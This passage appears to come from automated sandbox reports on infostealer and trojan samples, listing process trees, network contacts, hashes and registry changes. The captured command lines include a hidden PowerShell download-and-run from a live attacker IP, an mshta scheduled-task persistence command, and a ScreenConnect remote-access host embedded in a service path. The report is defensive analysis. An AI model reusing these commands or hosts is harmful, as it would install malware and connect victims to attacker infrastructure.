Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2676 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe C:\Windows\SysWOW64\cmd.exe
PID 2676 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe C:\Windows\SysWOW64\cmd.exe
PID 2676 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe C:\Windows\SysWOW64\cmd.exe
PID 2676 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe C:\Windows\SysWOW64\cmd.exe
PID 2676 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe C:\Windows\SysWOW64\mshta.exe
PID 2676 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe C:\Windows\SysWOW64\mshta.exe
PID 2676 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe C:\Windows\SysWOW64\mshta.exe
PID 2676 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe C:\Windows\SysWOW64\mshta.exe
PID 1232 wrote to memory of 2692 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1232 wrote to memory of 2692 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1232 wrote to memory of 2692 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1232 wrote to memory of 2692 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2724 wrote to memory of 2804 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2724 wrote to memory of 2804 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2724 wrote to memory of 2804 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2724 wrote to memory of 2804 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2804 wrote to memory of 1608 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE
PID 2804 wrote to memory of 1608 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE
PID 2804 wrote to memory of 1608 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE
PID 2804 wrote to memory of 1608 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE

Processes

C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn mxT1RmaX9Cr /tr "mshta C:\Users\Admin\AppData\Local\Temp\9T4YEFyEF.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\9T4YEFyEF.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn mxT1RmaX9Cr /tr "mshta C:\Users\Admin\AppData\Local\Temp\9T4YEFyEF.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'J4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE

"C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE"

Network

Country Destination Domain Proto
RU 185.215.113.16:80 185.215.113.16 tcp

Files

C:\Users\Admin\AppData\Local\Temp\9T4YEFyEF.hta

MD5 f0c99a072b3a41e0b07a63772514614a
SHA1 4149662f98408f25a9726b53bdd16325449f6316
SHA256 e7cf79e512a9b32c95a626735b09937a6456c1550f0ad39498487543c91116dd
SHA512 6b0efa113e09f10db718b7f3570920e551bb2c7442e239c00ebf29e601a4abe89ead41860467d823a0b0d0c998c8aacfc6e3a8af994a98d6c0375d77d05128c3

\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE

MD5 03a574d64f0e62c5e117a5f5acf137e4
SHA1 93ba2b5bdac91342c9eeaeaf3e44cc1793ee6d90
SHA256 dcc540b3c86a167bb0cf71e8d4598f7566fe0f625d64ffe7a37f0d5f502be747
SHA512 d1b76d82c522ccb157dcd5155011619b36baf3516cf08cb6bc98fb9bc009230e5c53d77f5d8adc0e85dde678b4b3542823919ee6490533df8250078caca1b9b1

memory/2804-8-0x0000000006580000-0x00000000069D2000-memory.dmp

memory/2804-13-0x0000000006580000-0x00000000069D2000-memory.dmp

memory/1608-15-0x0000000000B10000-0x0000000000F62000-memory.dmp

memory/1608-16-0x0000000000B10000-0x0000000000F62000-memory.dmp

memory/1608-17-0x0000000000B10000-0x0000000000F62000-memory.dmp

memory/1608-20-0x0000000000B10000-0x0000000000F62000-memory.dmp

Analysis: behavioral30

Detonation Overview

Submitted

2025-02-26 23:27

Reported

2025-02-26 23:30

Platform

win10v2004-20250217-en

Max time kernel

148s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\quarantine\xqWgymz.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\quarantine\xqWgymz.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\quarantine\xqWgymz.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\xqWgymz.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
GB 45.155.103.183:1488 tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp

Files

memory/428-0-0x0000016B0DF00000-0x0000016B0E000000-memory.dmp

memory/428-1-0x00007FFD4D593000-0x00007FFD4D595000-memory.dmp

memory/428-2-0x0000016B0F920000-0x0000016B0F972000-memory.dmp

memory/428-3-0x00007FFD4D590000-0x00007FFD4E051000-memory.dmp

memory/428-4-0x00007FFD4D590000-0x00007FFD4E051000-memory.dmp

memory/428-5-0x00007FF680700000-0x00007FF6808AE000-memory.dmp

memory/428-6-0x0000016B290D0000-0x0000016B291DA000-memory.dmp

memory/428-7-0x0000016B281C0000-0x0000016B281D2000-memory.dmp

memory/428-8-0x0000016B28EE0000-0x0000016B28F1C000-memory.dmp

memory/428-9-0x0000016B28F70000-0x0000016B28FC0000-memory.dmp

memory/428-10-0x0000016B0DF00000-0x0000016B0E000000-memory.dmp

memory/428-11-0x0000016B294D0000-0x0000016B29692000-memory.dmp

memory/428-12-0x0000016B2A4E0000-0x0000016B2AA08000-memory.dmp

memory/428-13-0x00007FFD4D593000-0x00007FFD4D595000-memory.dmp

memory/428-14-0x00007FFD4D590000-0x00007FFD4E051000-memory.dmp

memory/428-15-0x00007FFD4D590000-0x00007FFD4E051000-memory.dmp

memory/428-17-0x00007FFD4D590000-0x00007FFD4E051000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2025-02-26 23:27

Reported

2025-02-26 23:30

Platform

win7-20240903-en

Max time kernel

119s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe"

Signatures

Reads user/profile data of local email clients

spyware stealer

Checks installed software on the system

discovery

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1980 set thread context of 2956 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe N/A

Modifies system certificate store

defense_evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1980 wrote to memory of 1084 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe
PID 1980 wrote to memory of 1084 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe
PID 1980 wrote to memory of 1084 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe
PID 1980 wrote to memory of 1084 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe
PID 1980 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe
PID 1980 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe
PID 1980 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe
PID 1980 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe
PID 1980 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe
PID 1980 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe
PID 1980 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe
PID 1980 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe
PID 1980 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe
PID 1980 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe
PID 1980 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe C:\Windows\SysWOW64\WerFault.exe
PID 1980 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe C:\Windows\SysWOW64\WerFault.exe
PID 1980 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe C:\Windows\SysWOW64\WerFault.exe
PID 1980 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe C:\Windows\SysWOW64\WerFault.exe

Processes

C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1980 -s 508

Network

Country Destination Domain Proto
US 8.8.8.8:53 privileggoe.live udp
US 8.8.8.8:53 foresctwhispers.top udp
US 104.21.48.1:443 foresctwhispers.top tcp
US 8.8.8.8:53 tracnquilforest.life udp
US 104.21.74.230:443 tracnquilforest.life tcp
US 8.8.8.8:53 presentymusse.world udp
US 8.8.8.8:53 deaddereaste.today udp
US 8.8.8.8:53 subawhipnator.life udp
US 8.8.8.8:53 boltetuurked.digital udp
US 8.8.8.8:53 pastedeputten.life udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
US 8.8.8.8:53 disobilittyhell.live udp
US 104.21.81.29:443 disobilittyhell.live tcp
US 104.21.81.29:443 disobilittyhell.live tcp
US 104.21.81.29:443 disobilittyhell.live tcp

Files

memory/1980-0-0x0000000074BEE000-0x0000000074BEF000-memory.dmp

memory/1980-1-0x0000000000890000-0x00000000008F8000-memory.dmp

memory/2956-3-0x0000000000400000-0x000000000045E000-memory.dmp

memory/2956-14-0x0000000000400000-0x000000000045E000-memory.dmp

memory/2956-5-0x0000000000400000-0x000000000045E000-memory.dmp

memory/2956-12-0x0000000000400000-0x000000000045E000-memory.dmp

memory/2956-10-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2956-9-0x0000000000400000-0x000000000045E000-memory.dmp

memory/2956-8-0x0000000000400000-0x000000000045E000-memory.dmp

memory/2956-7-0x0000000000400000-0x000000000045E000-memory.dmp

memory/1980-15-0x0000000074BE0000-0x00000000752CE000-memory.dmp

memory/2956-16-0x0000000000400000-0x000000000045E000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 83142242e97b8953c386f988aa694e4a
SHA1 833ed12fc15b356136dcdd27c61a50f59c5c7d50
SHA256 d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
SHA512 bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

C:\Users\Admin\AppData\Local\Temp\TarF35B.tmp

MD5 109cab5505f5e065b63d01361467a83b
SHA1 4ed78955b9272a9ed689b51bf2bf4a86a25e53fc
SHA256 ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673
SHA512 753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc

memory/2956-54-0x0000000000400000-0x000000000045E000-memory.dmp

memory/1980-55-0x0000000074BE0000-0x00000000752CE000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2025-02-26 23:27

Reported

2025-02-26 23:30

Platform

win7-20240903-en

Max time kernel

150s

Max time network

151s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\quarantine\am_no.bat"

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

Vidar

stealer vidar

Vidar family

vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\ScreenConnect Client (3be09d9e5e840c20)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (3be09d9e5e840c20)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=bbcnas2.zapto.org&p=8041&s=e228137a-1681-43c0-a833-6e8e39d6fe60&k=BgIAAACkAABSU0ExAAgAAAEAAQBdpn0O4B1VqMLUD0QDsNyYTlq4tRTm9ACUnnSMesFZALDh%2bLgBUwyTJ9D684SXejMRZmxv0Ws0vI2HDF%2f3pgx%2bIGwSyAZ%2fcl0w71rKbKyIIKYDZKbnkGgXvWGAi3ZyQp5OOPPQACb3KOn3dbHGC7zVR4YxQG18q4ph%2fyqoczab4g1p0ctN9m9IinVuQ4spX2nQNInOfCqxjvWdinItao7pk9fPOEV6qP3zSVfOwlnLHbRaASXeN%2fudvdB8e5o68h%2bjKG6VwXtszNJDCo7VtQqZmoYLmAVq9dmcJjckjVt0p%2bJPysj6usBrEV3AzT%2ff7W%2bYHYQ0svZBekSGOWFY8kLf&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAA6tAbC%2fd6IUm5KlyUsecM8wAAAAACAAAAAAAQZgAAAAEAACAAAAD%2bFWnEtXsXf6dv9%2biWS2mb246%2bRvHSvQbUp%2fSFTn0blwAAAAAOgAAAAAIAACAAAADkHLI487uefiU0MIAGiHY4HdRUacWhhdqcpeKLK0S3MqAEAABTEdQ2nm9aw8mWDMrlRhLj9YAw1IOICtN3qYONlpSq6J2mNV55%2fAvzADXO6S4Tmr1q7lF97Rkz%2blaDcqTVA2IHcz5jej3UKDxfYkSEDDirtySp9%2fGe5b1siLBj2pbmkYUMHgvq4IZL%2fLMry%2bGfMf0weSEE%2foBLPuIyIh3ZfQ8SgmNp2Hp2C%2ffhEu3QZfVrjyou9YL8do7jKatydjn9ZiodaC5Pvw3PJAvy%2bOX9KDg8ZgB4wMoqqchqCYNx%2f3yxCQDHCGz1hygzuMOBCSyONUWzeOxjjddpmU3dY08dNa4V9TAAwmVk0J2G2Kg%2fdwxjPnKn%2bIkPIpyNFwcrpzvpo3QAVMy9YzUc4R8Vrkn233x9WWV%2bf0nkucOpj3msl5UMJGrVqb5EMilczPC7D7hS9ynjUeKBi8OnWui2oyY5qiK4oyZcM4v6hGkbj1k4Ie92xpZzBvrj9Fquu%2fmlQbYockpoDyh%2f3st%2f5XOc5NjgEtmzs7zHDw8FrqRV5c8X2JLKwoPH3sg5TdQIZjz%2f5ehl0tHCeeLCQeu4LBnWbtOJ1IGnE1ccKPj%2bWzsP5CKwaHGHtFbRJg3OrHCHnKULTVV2hPgfZThG0lqE199iHP12Cqj9LQdhwMkFwWipvu29MMaZYLf0OxT3rwlBhlbvLA7nqPJXlfLvweIMsViX%2bUJolLM4xs0zu%2fnRyfkNFIdJ9nTztmcaQFLlzuYxkqepiIgOXmkt%2fXfndfcjtzaKo7wNI%2feJaY5eTRBn9BYsNwjvOIf4jWtjpw5NN18ac0hvCQSqeeg6m96SSKysJTp4tUryCokLHbvcxAj%2fZehgcJk7FOiyKAbDci5CXLNGpd70YQkMUW47JvCKJmt78WilpCvrhdR%2b9atel4zuErQf70pXopHA8N7r020%2fz0AUQBo89lQNQr9%2bhminXWES%2fCcxqhJxGvTR%2btzfntNVEM90aK9JTt1AyDB124P9ugoJQGl58pQov%2fgPmt1gOQ25Ck%2f5rZfrJhfZSwOKXkNYwAEuxTUNvz3AtlNBP97jiOuZhAij5Zc7y4kaXsDKSN8Zw9ZwIcQTQXHrfMEaYcwDRIugNjE0wAYsRr5omnCnUaOg819cEydPBl1LKbmRPk6wwdZRs7dZWlO9ST%2bBU3q9cjLiQEQ8rCLoxrlIRtwyCJCoK8S5eUHJwTL1WaJ9N4Ol0JCnW0aIKehufneBFgiIl7yzX%2bqvx68Ao8xnthe26AzpTf3tGqndfnEvIQcwpPALNKFxZCwKPNadpeaR%2fd3VIBYxBa19k%2bxQMLmfn3XaFNOCwfyavO8%2fuP6jk3Ly7s1BcpOjHCof%2fjtSY3VdyJAOlu2XLO6%2bm9Y%2f%2fmmmiTiWUFvZzF9H6alw8AAgZZ8UO7i9rpnVRM8dwzdB0gM7fnGAlkYAqreO09MpdV5FV93DQ5Z